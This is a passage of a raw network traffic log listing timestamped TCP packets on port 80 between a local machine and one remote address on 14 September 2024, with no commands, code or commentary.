                                        Sep 14, 2024 18:31:10.560311079 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.560321093 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.560331106 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.560342073 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.560349941 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.560353994 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.560373068 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.560406923 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.560406923 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.560441971 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.560488939 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.560499907 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.560508966 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.560537100 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.560570002 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.560571909 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.560583115 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.560592890 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.560604095 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.560635090 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.560667992 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.560688972 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.560698986 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.560709000 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.560740948 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.560751915 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.560762882 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.560770988 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.560781002 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.560791016 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.560802937 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.560836077 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.560926914 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.560937881 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.560946941 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.560956001 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.560966969 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.560976028 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.560988903 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.560997963 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.561007977 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.561021090 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.561032057 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.561042070 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.561053038 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.561053038 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.561100960 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.561134100 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.561199903 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.561249018 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.561253071 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.561256886 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.561269045 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.561276913 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.561307907 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.561345100 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.561458111 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.561469078 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.561477900 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.561487913 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.561496973 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.561506987 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.561517000 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.561525106 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.561532974 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.561533928 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.561546087 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.561556101 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.561564922 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.561574936 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.561577082 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.561584949 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.561599016 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.561635017 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.561666965 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.561794043 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.561831951 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.561840057 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.561875105 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.561912060 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.561922073 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.561932087 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.561943054 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.561954021 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.561966896 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.562000990 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.563162088 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.563179016 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.563199043 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.563220024 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.563229084 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.563283920 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.563293934 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.563302040 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.563313007 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.563366890 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.598902941 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.598917961 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.598927975 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.598937035 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.598947048 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.598956108 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.598965883 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.598975897 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.599456072 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.644042015 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.644062996 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.644074917 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.644085884 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.644098043 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.644109964 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.644159079 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.644160032 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.644171953 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.644184113 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.644195080 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.644213915 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.644224882 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.644236088 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.644247055 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.644278049 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.644402981 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.644470930 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.645071030 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.645174026 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.645179033 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.645190954 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.645203114 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.645215034 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.645231009 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.645242929 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.645255089 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.645409107 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.645502090 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.646318913 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.646375895 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.646387100 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.646414995 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.646446943 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.646459103 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.646470070 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.646470070 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.646482944 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.646684885 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.646744967 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.646755934 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.646769047 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.646836042 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.646837950 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.646848917 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.646866083 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.646915913 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.646919966 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.646929026 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.646995068 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.647468090 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.647548914 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.647564888 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.647577047 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.647588968 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.647608042 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.647619963 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.647630930 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.647670984 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.647681952 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.647692919 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.647706985 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.647717953 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.647768974 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.647825956 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.647839069 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.647850037 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.647862911 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.647869110 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.647901058 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.647919893 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.647931099 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.647941113 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.647953033 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.647970915 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.648005962 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648019075 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648030043 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648034096 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.648041964 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648053885 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648077965 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648088932 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648097992 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.648099899 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648183107 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648195028 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648205996 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648215055 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648226023 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648226023 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.648257971 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.648288012 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648299932 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648341894 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.648366928 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648379087 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648390055 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648396015 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.648402929 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648415089 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648427010 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648458004 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.648509026 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.648520947 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648531914 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648542881 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648555994 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648567915 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648578882 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648590088 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648629904 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.648653984 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648667097 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648677111 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648693085 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.648753881 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.648791075 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648803949 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648818970 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648832083 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648843050 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648854017 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648864985 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648875952 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648888111 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648897886 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648907900 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.648907900 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648924112 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648948908 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.648989916 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.649049044 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.649108887 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.649168015 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.649184942 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.649197102 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.649208069 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.649241924 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.649256945 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.649269104 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.649279118 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.649341106 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.659471989 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.659580946 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.659590960 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.659632921 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.659636974 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.659645081 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.659657001 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.659667969 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.659825087 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.685735941 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.685758114 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.685769081 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.685786009 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.685797930 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.685807943 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.685818911 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.685830116 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.686364889 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.730988026 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.731035948 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.731045008 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.731050968 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.731056929 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.731087923 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.731098890 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.731117010 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.731183052 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.731193066 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.731204033 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.731215000 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.731225014 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.731280088 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.731291056 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.731355906 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.731355906 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.731355906 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.732043028 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.732083082 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.732096910 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.732110023 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.732120991 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.732207060 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.732218981 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.732228994 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.732403994 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.732404947 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.733100891 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.733148098 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.733156919 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.733185053 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.733196020 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.733206987 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.733258963 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.733269930 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.733314991 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.733349085 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.733597994 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.733644009 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.733653069 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.733663082 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.733669996 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.733701944 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.733712912 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.733762026 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.733771086 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.733772039 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.733803034 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.734419107 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.734428883 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.734447002 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.734515905 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.734527111 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.734536886 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.734544992 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.734577894 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.734577894 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.734591961 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.734611988 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.734622002 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.734631062 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.734673977 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.734711885 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.734723091 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.734733105 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.734744072 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.734754086 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.734771013 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.734805107 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.734810114 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.734821081 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.734829903 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.734864950 CEST4973880192.168.2.4172.67.203.195
